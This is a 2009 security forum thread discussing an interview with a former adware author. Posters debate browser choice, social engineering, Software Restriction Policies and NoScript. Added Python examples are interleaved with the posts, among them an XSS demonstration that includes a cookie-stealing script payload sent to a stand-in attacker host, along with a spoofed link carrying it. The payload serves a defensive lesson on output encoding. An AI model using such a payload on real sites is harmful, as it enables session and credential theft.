Interview with an Adware Author
Pedro
January 14th, 2009, 10:26 AM
-{ Quote: "Matt Knox, a talented Ruby instructor and coder, talks about his early days designing and writing adware for Direct Revenue. (Direct Revenue was sued by Eliot Spitzer in 2006 for allegedly surreptitiously installing adware on millions of computers.)" }-
http://philosecurity.org/2009/01/12/interview-with-an-adware-author
Great interview if you ask me.
Alcyon
January 14th, 2009, 01:03 PM
Thanks for the link, Pedro. Very good interview.
JRViejo
January 14th, 2009, 01:10 PM
Pedro, excellent interview :thumb: especially the question: Can you tell me more about your strategies for persistence? If that section doesn't make people think twice about using IE, nothing will!
Meriadoc
January 14th, 2009, 01:11 PM
Thanks. It was a good interview.
tlu
January 15th, 2009, 08:31 AM
-{ Quote: "Pedro, excellent interview :thumb: especially the question: Can you tell me more about your strategies for persistence? If that section doesn't make people think twice about using IE, nothing will!" }-
Indeed. On the other hand, even many forum members here (who should be aware of security issues) still use IE. And I guess many of them still have ActiveX and BHOs enabled. Considering this sad fact - why should anyone expect non-members to change their habits? ;D
EDIT: A nice comment by Giorgio Maone (http://hackademix.net/2008/12/17/opera-firefox-and-ie-security-updates-all-together-all-the-same/) on IE versus other browsers.
Rmus
January 15th, 2009, 12:41 PM
-{ Quote: "Pedro, excellent interview :thumb: especially the question: Can you tell me more about your strategies for persistence? If that section doesn't make people think twice about using IE, nothing will!" }-But note also these:
-{ Quote: "M: Their business model was that they would buy a screensaver from somebody, or develop it themselves. It would be some stupid thing like a guy who’s washing their screen. Looks like a window washer guy? They’d say “Hey, if you want this, install our adware and you can have it for free.” An astonishing number of people will do that." }-
-{ Quote: "Don’t fool yourself: Firefox would not have saved you. There are two reasons for this.
First, we did not take advantage of IE vulnerabilities to get on the machine, nor did we need to. Once you clicked on the ‘download’ button, whatever your browser, we were just another setup program.
Second, we eventually abandoned the IE-specific BHO architecture in favor of using the Accessibility API, which works with all browsers, and some version of which exists on most operating systems. [comment #66]" }-
-{ Quote: "M: People can have things as good as they are willing to work for. If you want to have a system that’s clean of nasty software, you can do that." }-I know users of IE who would agree.
----
rich
JRViejo
January 15th, 2009, 11:00 PM
-{ Quote: "Indeed. On the other hand even many forum members here (who should be aware of security issues) still use IE. And I guess many of them have ActiveX and BHO's still enabled. Considering this sad fact - why should anyone expect non-members change their habits? ;D" }-
tlu, I agree with you that many of our forum members will continue to use IE no matter what, however, indicative of their sigs, most have armed themselves with hardware and software that Joe Public might never use.
My comment was/is directed at those who visit Wilders seeking knowledge (like I did many years ago) rather than persuading long time forum members. For as long as articles are posted, like Pedro did, there is a chance that we can motivate people to change their ways, even if it is only one person at a time. That's all we can hope for.
JRViejo
January 15th, 2009, 11:18 PM
-{ Quote: "Second, we eventually abandoned the IE-specific BHO architecture in favor of using the Accessibility API, which works with all browsers, and some version of which exists on most operating systems." }-
Rmus, yes, it's very clever to use the accessibility.api, found in Adobe Reader, to infiltrate all browsers and most OSes with adware, but I'm glad you brought that up because a conflict with Reader was the main reason why I gave up on IE7 and went to Firefox.
When IE7 first came out officially, not BETA, in 2006, I had a heck of a time with the browser crashing and so did many others as seen by the frequency of forums' postings in those days (even today, IE7 has crash issues with Adobe's Flash Player 10). Adobe Reader turned out to be the culprit, and with its inability to display a PDF page inside the IE7 browser then, made me look at Wilders for browser alternatives and that's when I discovered Firefox. I reverted back to IE6 and use it sparingly today.
Will I ever go back to IE? Perhaps. Every thing I read about IE8 piques my interest, however, this time, I won't rush into it.
Rmus
January 16th, 2009, 02:08 AM
-{ Quote: "Rmus, yes, it's very clever to use the accessibility.api, found in Adobe Reader, to infiltrate all browsers and most OSes with adware, " }-Please explain how this infiltration takes place.
-{ Quote: " Adobe Reader turned out to be the culprit, and with its inability to display a PDF page inside the IE7 browser " }-Just curious, why you display PDF files inside the browser rather than with the Reader.
----
rich
Rmus
January 16th, 2009, 02:11 AM
-{ Quote: "tlu, I agree with you that many of our forum members will continue to use IE no matter what, " }-What is wrong with that?
----
rich
TOMxEU
January 16th, 2009, 03:32 AM
Alternative browser is a good advice for the average Joe, I install Firefox to all my friends. But people on Wilders can choose browser based on their needs. ;)
JRViejo
January 16th, 2009, 03:39 AM
-{ Quote: "Please explain how this infiltration takes place." }-
Rmus, that I will not do, sorry. The article offers the gist of it; let's leave it at that.
-{ Quote: "Just curious, why you display PDF files inside the browser rather than with the Reader." }-
Ease of use. I code Web sites and have many programs open, at any given time, while working on projects. Don't need another window bugging me.
-{ Quote: "What is wrong with that?" }-
Nothing at all; different strokes for different folks.
tlu
January 16th, 2009, 07:16 AM
-{ Quote: "What is wrong with that?" }-
Rich, there are several reasons. Some arguments can be found in the link (http://hackademix.net/2008/12/17/opera-firefox-and-ie-security-updates-all-together-all-the-same/) I provided above. Additional arguments are presented here (http://www.wilderssecurity.com/showpost.php?p=1386835&postcount=9).
The point is: IE is tightly integrated in Windows. A couple of other system applications (like Help and Desktop) use IE. To make this possible Microsoft extended the abilities of JavaScript by creating JScript. JScript is as powerful as VBS: via FileSystemObject it can open or delete files, start applications, communicate with other processes etc. Thus, it's obvious that a security flaw very often affects many other aspects of the OS. JavaScript (as used in, e.g., Firefox) is much more limited as it doesn't have a FileSystemObject and therefore no direct access to your local files. And, of course, Firefox (or any other browser) is not used for other system applications - a security flaw consequently won't affect other functionalities of the OS.
Rmus
January 16th, 2009, 01:22 PM
-{ Quote: "Please explain how this infiltration takes place." }-
-{ Quote: "Rmus, that I will not do, sorry. The article offers the gist of it; let's leave it at that." }-Fair enough. I wouldn't want you to reveal any "secrets." I just thought you might clarify what you mean by "infiltration." BHO and Accessibility API were discussed under "Persistence," meaning, as I understand it, what takes place after the user agrees to install the Adware, and are not the initial infection method. Some readers might conclude wrongly.
Regarding comments about IE: Because of the sensational news reports about IE and Windows, it is assumed that you live dangerously indeed if you use IE, for just opening even to a "legitimate" web site is cause for certain doom...
I exaggerate, of course, but uninformed readers of this stuff do come away with that impression. In the past year, more analysts and researchers are looking a bit more closely at the statistics and the real world.
From a recent Windows Secrets Newsletter:
-{ Quote: "Most PC users have a distorted view of the nature of the security risks they face. Conventional wisdom holds that the three biggest threats come from (1) criminals exploiting flaws in Windows and other software products; (2) e-mail-borne viruses; and, more recently, (3) visits to malicious Web sites.
Security research company Trend Micro recently reported that of the top 100 infections in the U.S. in 2008, approximately 63% were caused by downloading and running programs. E-mail-borne infections accounted for only 3%, while the exploitation of security flaws in products was responsible for a tiny 1.7% of PC infections." }-
http://de.trendmicro.com/de/about/news/pr/article/20081216155324.html
-{ Quote: ""This is what we've been seeing all year," said Paul Ferguson, network architect at Trend Micro. "This illustrates that social engineering seems to be playing a larger role than we thought. The problem isn't due to software vulnerabilities in, say, the browser."" }-I have confirmed this with a local shop: most victims admit that they downloaded something and didn't realize it was infected.
Social engineering (a polite way of describing user stupidity) is illustrated most recently by the flash_update.exe exploit, where the user is enticed to watch an alluring video:
[screenshot attachment]
No browser, nor even operating system, will protect against this type of exploit, as illustrated in this comment in an analysis last year of an update trick which served up the MAC DNS changer exploit:
-{ Quote: "The user is then prompted to install the package and during this process he will have to supply the administrator credentials. Yep, it's game over from this point in time (and the attack is exactly the same as on Windows - keep in mind that these users *will* willingly supply these credentials." }-
Storm, one of the biggest botnets, ensnares its victims with a similar temptation:
[screenshot attachment]
Returning to the exploitation of security flaws in products for a moment: the recent 7.7.7.0 Search Engine exploit showed how infection can occur by remote code execution (drive-by download) no matter the browser -- these comments from other forums:
-{ Quote: "Common to lots of other people (I guess), [Running Firefox] I clicked a Google link, the browser minimised, pop-ups appeared, you know the drill. I closed everything down and ran a full virus scan (AVG) - nothing was found.
....
In each case, my search results were redirected through the IP address 7.7.7.0.
I use Mozilla Firefox exclusively, rather than Internet Explorer
....
In short, there are some sites that are performing remote code execution based on security vulnerabilities in unpatched or un-updated versions of Adobe Acrobat (Reader and Full) version 7 and 8. The rootkit is sent encapsulated in a PDF file and security holes in Acrobat allow the rootkit file to execute after reception.
...
But this is what I have observed thus far. After entering via the PDF security vulnerability, the file C:\WINDOWS\system32\sysaudio.sys is created and executes first as a Trojan and then a Rootkit Agent. " }-Later the filename changed to wdmaud.sys.
This, of course, is not a browser exploit per se, but illustrates how malware authors are becoming more sophisticated in how they target their victims.
It should be obvious to people that protection should not rely entirely on the browser or applications that may be vulnerable before a patch is released.
All of the Remote Code Execution Exploits that download malware that I have seen analyzed, have in common what I put in bold above:
executes first as a Trojan
What better way to protect than to start with the foundation layer of securing with Software Restriction Policies and LUA.
tlu's tutorials (which are worthy of publication, in my view) should be considered by all.
I will quote again from the interview,
-{ Quote: "M: People can have things as good as they are willing to work for. If you want to have a system that’s clean of nasty software, you can do that." }-
Of course, even this will not protect against the topic of discussion, where the user agrees to download and run the setup.exe which installs the adware.
----
rich
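The post above argues that the dropped file "executes first as a Trojan" and that Software Restriction Policies (SRP) plus a limited user account (LUA) are the foundation layer against that. The following is an added example, not code from the thread or from Microsoft: a small Python model of the documented SRP path-rule semantics (the default level applies when no rule matches, and among matching path rules the most specific one wins) combined with a simplified write-permission model in which a standard user can write only under the profile directory. The environment-variable values, the rule set, the drop paths and the helper names are all assumptions.

```python
"""Model of how Software Restriction Policies (SRP) and a limited user
account (LUA) interact with a dropped executable.

Added illustration, not code from the thread.  It simulates the documented
SRP rule semantics (default level applies when nothing matches; the most
specific matching path rule wins) and a simplified NTFS layout in which a
standard user can write only under the profile directory.  The environment
variable values, rule set and file paths are assumptions.
"""
from dataclasses import dataclass
from typing import List

DISALLOWED = "Disallowed"
UNRESTRICTED = "Unrestricted"

# Assumed machine layout (hypothetical values).
ENV = {
    "%SystemRoot%": r"C:\Windows",
    "%ProgramFiles%": r"C:\Program Files",
    "%UserProfile%": r"C:\Users\alice",
}


def expand(path: str) -> str:
    """Expand the assumed environment variables; SRP matching is case-insensitive."""
    for var, value in ENV.items():
        path = path.replace(var, value)
    return path.lower()


@dataclass(frozen=True)
class PathRule:
    path: str   # folder the rule covers, may contain an %ENV% variable
    level: str  # DISALLOWED or UNRESTRICTED

    def matches(self, target: str) -> bool:
        folder = expand(self.path).rstrip("\\")
        return target == folder or target.startswith(folder + "\\")


# A default-deny policy: everything is Disallowed unless it lives in a
# directory only administrators can write to.  The Temp rule shows the
# precedence point: it is more specific than %SystemRoot%, so it wins there.
DEFAULT_LEVEL = DISALLOWED
RULES: List[PathRule] = [
    PathRule(r"%SystemRoot%", UNRESTRICTED),
    PathRule(r"%ProgramFiles%", UNRESTRICTED),
    PathRule(r"%SystemRoot%\Temp", DISALLOWED),
]


def evaluate_srp(exe_path: str, rules=RULES, default=DEFAULT_LEVEL) -> str:
    """Return the SRP level that applies to a user-mode executable.

    Kernel drivers (such as the .sys file quoted in the thread) are loaded by
    the kernel, not through the user-mode checks SRP hooks, so they are out of
    scope for this function.
    """
    target = expand(exe_path)
    matching = [r for r in rules if r.matches(target)]
    if not matching:
        return default
    # Most specific rule = longest expanded path.
    winner = max(matching, key=lambda r: len(expand(r.path)))
    return winner.level


def can_write(path: str, is_admin: bool) -> bool:
    """Simplified ACL model: admins write anywhere, standard users only
    under their own profile."""
    if is_admin:
        return True
    return expand(path).startswith(expand("%UserProfile%") + "\\")


def simulate_drop(drop_path: str, is_admin: bool) -> str:
    """What happens when a trojan tries to write itself to drop_path and run."""
    if not can_write(drop_path, is_admin):
        return "write denied (LUA)"
    if evaluate_srp(drop_path) == DISALLOWED:
        return "blocked by SRP"
    return "executes"


if __name__ == "__main__":
    cases = [
        (r"%UserProfile%\AppData\Local\Temp\setup.exe", False),
        (r"%SystemRoot%\system32\dropped.exe", False),
        (r"%SystemRoot%\system32\dropped.exe", True),
        (r"%SystemRoot%\Temp\dropped.exe", True),
    ]
    for path, admin in cases:
        who = "admin" if admin else "standard user"
        print(f"{path} as {who}: {simulate_drop(path, admin)}")
```

The third case is the caveat worth noticing: the default SRP rules trust %SystemRoot%, so a drop into system32 made with administrator rights runs unhindered. SRP only closes the user-writable locations; it is LUA that keeps the trojan out of the trusted ones, which is why the two are paired.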
JRViejo
January 16th, 2009, 02:41 PM
-{ Quote: "I just thought you might clarify what you mean by "infiltration." BHO and Accessibility API were discussed under "Persistence," meaning, as I understand it, what takes place after the user agrees to install the Adware, and are not the initial infection method. Some readers might conclude wrongly." }-
Rmus, you are correct, I was speaking after the user has clicked on whatever it's presented on screen, enticing that person to go beyond. The usage of the word infiltration is due to my ex-military background and I should be more careful not to paint things in such dire terms.
You are absolutely dead-on when you state user stupidity being the main reason why PCs get infected. I have clients who, no matter what you say to them, will click on an email link, open an attachment, download a screen saver, etc., then come pleading for help when their PCs turn into bricks. Yes, you switch them to Firefox and they still find a way to hurt themselves. You explain and have them try SRPs, LUAs and UACs, but some find them too restrictive and access the Administrator account to bypass it all. Well, I make money off of their misery, but these people should not be allowed to own a computer. There ought to be a law against that!
Mind you, personally, I did not switch browsers because I thought IE was less secure (I'm in the tlu camp: I block everything in the Internet zone but do allow only the most trusted sites in the Trusted zone plus Sandboxie is my friend), I found FF because of the stated problem with IE7. The addition of NoScript and AdBlock Plus add-ons was just icing on the cake and IE Tab allows me not to fire up IE at all. Yes, I know about the IE7 Pro add-on but FF has become a good tool. After IE8 is out for 6 months, I'll give it a look, but FF 3.1 is looking mighty good as well. ;)
tlu
January 22nd, 2009, 11:48 AM
-{ Quote: "
From a recent Windows Secrets Newsletter:
Quote:
Most PC users have a distorted view of the nature of the security risks they face. Conventional wisdom holds that the three biggest threats come from (1) criminals exploiting flaws in Windows and other software products; (2) e-mail-borne viruses; and, more recently, (3) visits to malicious Web sites.
Security research company Trend Micro recently reported that of the top 100 infections in the U.S. in 2008, approximately 63% were caused by downloading and running programs. E-mail-borne infections accounted for only 3%, while the exploitation of security flaws in products was responsible for a tiny 1.7% of PC infections.
http://de.trendmicro.com/de/about/news/pr/article/20081216155324.html
I have confirmed this with a local shop: most victims admit that they downloaded something and didn't realize it was infected." }-
Rich, I agree in general. However, it's not only a matter of your OS becoming infected but also about surfing-related risks like password stealing, XSS, clickjacking, Iframe injection etc. If the figures presented here (http://www.informationweek.com/news/internet/security/showArticle.jhtml?articleID=212901775&subSection=Vulnerabilities+and+threats) are only roughly realistic, these dangers should not be underestimated. Having said this, blocking any active content by default makes a lot of sense. From my point of view the Firefox extension NoScript is not only the best protection against these threats on the client side (and even unique in many respects) but also the most user-friendly. The zones concept in IE is simply unusable. Even if IE isn't a less secure browser compared to Firefox when it comes to security leaks and speed of patching, it lacks usability since a strategy of blocking everything by default and easily whitelisting only trustworthy sites can hardly be implemented in IE.
-{ Quote: "What better way to protect than to start with the foundation layer of securing with Software Restriction Policies and LUA. " }-
I won't disagree ;) but this doesn't protect against above mentioned surfing-related risks.
-{ Quote: "tlu's tutorials (which are worthy of publication, in my view) should be considered by all." }-
You're exaggerating :-[ but thanks for the praise.
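The "block everything by default, whitelist only trustworthy sites" strategy described above comes down to one decision per script: is its origin on the user's allowlist? The following is an added example, not NoScript's code and not from the thread: a Python model of that default-deny decision, with the matching rule a practitioner has to get right (an entry for bank.example must cover www.bank.example but must not cover bank.example.evil.test, which a naive substring test would accept). The allowlist entries and URLs are assumptions.

```python
"""Default-deny script policy with a site allowlist.

Added illustration in the spirit of the whitelisting strategy discussed in
the thread; it is a model, not NoScript's actual logic.  Allowlist entries
and URLs are assumptions.
"""
from typing import Iterable, Optional
from urllib.parse import urlsplit

ALLOWLIST = {"bank.example", "wilderssecurity.com"}  # assumed user choices


def host_of(url: str) -> Optional[str]:
    """Host part of an http(s) URL, lower-cased, without port.

    Non-http schemes (javascript:, data:, file:) never get trusted here.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return None
    host = (parts.hostname or "").lower()
    return host or None


def host_allowed(host: str, allowlist: Iterable[str] = ALLOWLIST) -> bool:
    """True if host equals an entry or is a subdomain of it.

    The check is anchored on a label boundary ("." + entry), which is what
    keeps bank.example.evil.test from matching bank.example.
    """
    host = host.lower().rstrip(".")
    for entry in allowlist:
        entry = entry.lower().rstrip(".")
        if host == entry or host.endswith("." + entry):
            return True
    return False


def naive_allowed(host: str, allowlist: Iterable[str] = ALLOWLIST) -> bool:
    """The bug to avoid: plain substring matching on the host name."""
    return any(entry in host for entry in allowlist)


def script_allowed(script_url: str, allowlist: Iterable[str] = ALLOWLIST) -> bool:
    """Default deny: run a script only if its origin host is allowlisted."""
    host = host_of(script_url)
    return host is not None and host_allowed(host, allowlist)


if __name__ == "__main__":
    for url in (
        "https://www.bank.example/app.js",
        "https://bank.example.evil.test/x.js",
        "https://adserver.example/ads.js",
        "javascript:alert(1)",
    ):
        print(f"{url}: {'allow' if script_allowed(url) else 'block'}")
```

Everything not explicitly listed is blocked, so a compromised third-party script host or an injected script tag pointing elsewhere runs only if the user has already chosen to trust that domain.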
Rmus
January 22nd, 2009, 01:13 PM
-{ Quote: "Rich, I agree in general. However, it's not only a matter of your OS becoming infected but also about surfing-related risks like password stealing, XSS, clickjacking, Iframe injection etc. If the figures presented here (http://www.informationweek.com/news/internet/security/showArticle.jhtml?articleID=212901775&subSection=Vulnerabilities+and+threats) are only roughly realistic these dangers should not underestimated." }-Hello, Thomas.
This is not entirely connected with the Adware exploit, but does hint at awareness of exploits in general
I don't see a break down in that article "70 Of Top 100 Web Sites Spread Malware," of specific risks, such as those you refer to. For example, the article also includes:
-{ Quote: "Spam messages with malicious links can also lead to site compromises. According to Websense's report, almost 85% of e-mail messages were spam during the second half of 2008, and more than 90% of spam messages contained links to spam sites or malicious sites." }-So we don't know what %age of those sites that spread malware have the exploits you mention.
In XSS exploits I think the biggest concerns with people are sites where they transact business -- especially their financial institutions
I assume you mean the non-persistent type of XSS, since to permanently embed an XSS script on a banking or other financial site would be quite a feat indeed. So, a successful exploit requires:
- injection by means of a spoofed link when the user clicks on a link to take her/him to the secure login page. That is certainly a NO-NO and violates what should be a firm policy of only connecting via your own bookmark. This is similar to another in the NO-NO category, that of following links to install an executable file -- most recently illustrated in the fake Obama web sites.
- a web site that is vulnerable to that type of code injection
I haven't looked at Clickjacking in a while and I see that not much has been written on it since the disclosure of the vulnerability back in October. I have this in my notes:
http://ha.ckers.org/blog/20081007/clickjacking-details/
-{ Quote: "From an attacker’s perspective the most important thing is that a) they know where to click and b) they know the URL of the page they want you to click, in the case of cross domain access. So if either one of these two requirements aren’t met, the attack falls down." }-Nonetheless, this is certainly something to watch for, to see if any exploits develop, and if the Browser vendors are working to plug this weakness. Meanwhile your suggestion of NoScript seems to be the best protection at the moment for those concerned.
----
rich
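The post above distinguishes non-persistent XSS, which needs the victim to follow a spoofed link, from the persistent kind, where the script is embedded in the site itself. The following is an added example, not from the thread: a Python sketch of both variants against a toy search page and guest book, each rendered once without and once with HTML entity encoding of untrusted output. The site name, the payload, the helper names and the crude script detector are assumptions.

```python
"""Reflected (non-persistent) versus stored (persistent) XSS, and output
encoding as the fix.

Added illustration, not from the thread: a toy search page and guest book
rendered two ways.  The site name, payload and helper names are assumptions.
"""
import html
from typing import Callable, List
from urllib.parse import parse_qs, urlencode, urlsplit

SITE = "https://bank.example/search"  # hypothetical target
PAYLOAD = "<script>document.location='https://evil.test/?c='+document.cookie</script>"


def render_search_vulnerable(query: str) -> str:
    """Echoes the query into HTML untouched: reflected XSS whenever the
    query arrives through an attacker-crafted link."""
    return f"<h1>Results for: {query}</h1>"


def render_search_hardened(query: str) -> str:
    """Same page with HTML entity encoding applied to the untrusted value."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def spoofed_link(site: str = SITE, payload: str = PAYLOAD) -> str:
    """The link the victim has to click for a reflected attack to work."""
    return site + "?" + urlencode({"q": payload})


def handle_request(url: str, renderer: Callable[[str], str]) -> str:
    """Server side: pull ?q= out of the requested URL and render the page."""
    query = parse_qs(urlsplit(url).query).get("q", [""])[0]
    return renderer(query)


class GuestBook:
    """Stored XSS: the payload is saved once and served to every visitor,
    so no spoofed link and no click by the victim are required."""

    def __init__(self, escape_output: bool):
        self.escape_output = escape_output
        self.entries: List[str] = []

    def post(self, text: str) -> None:
        self.entries.append(text)

    def render(self) -> str:
        items = [
            html.escape(e, quote=True) if self.escape_output else e
            for e in self.entries
        ]
        return "<ul>" + "".join(f"<li>{e}</li>" for e in items) + "</ul>"


def has_live_script(page_html: str) -> bool:
    """Crude detector for an un-neutralised script tag in rendered output."""
    return "<script" in page_html.lower()


if __name__ == "__main__":
    link = spoofed_link()
    print("spoofed link:", link)
    for name, renderer in (("vulnerable", render_search_vulnerable),
                           ("hardened", render_search_hardened)):
        page = handle_request(link, renderer)
        print(f"{name}: live script = {has_live_script(page)}")
    for escape in (False, True):
        book = GuestBook(escape_output=escape)
        book.post(PAYLOAD)
        print(f"guest book escape={escape}: live script = {has_live_script(book.render())}")
```

The bookmark policy from the post only removes the reflected vector; the guest book shows that once the payload is stored server-side, the only thing standing between it and every visitor is the site's own output encoding (or a client-side script block such as NoScript).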
tlu
February 1st, 2009, 12:18 PM
Regarding our discussion about browsers, there is a very illuminative article on http://www.heise-online.co.uk/news/Microsoft-PR-blunder-over-Internet-Explorer-security--/112526
Searching_ _ _
February 2nd, 2009, 04:06 PM
I'm just waiting for comments from Harry. Then it will be complete.
All in all it is pretty scary. A 20k development environment installed on a machine that is compromised. Now all pwned machines need is a text file update. Executables as threads, then threadless, WOW. Sounds like win32 over NT is an issue worse than any browser.
Thanks Tom and Rich for the added info. Scary stuff.
P.S. Do you guys sing any country music tunes?
Copyright ©2002 - 2012, Wilders Security Forums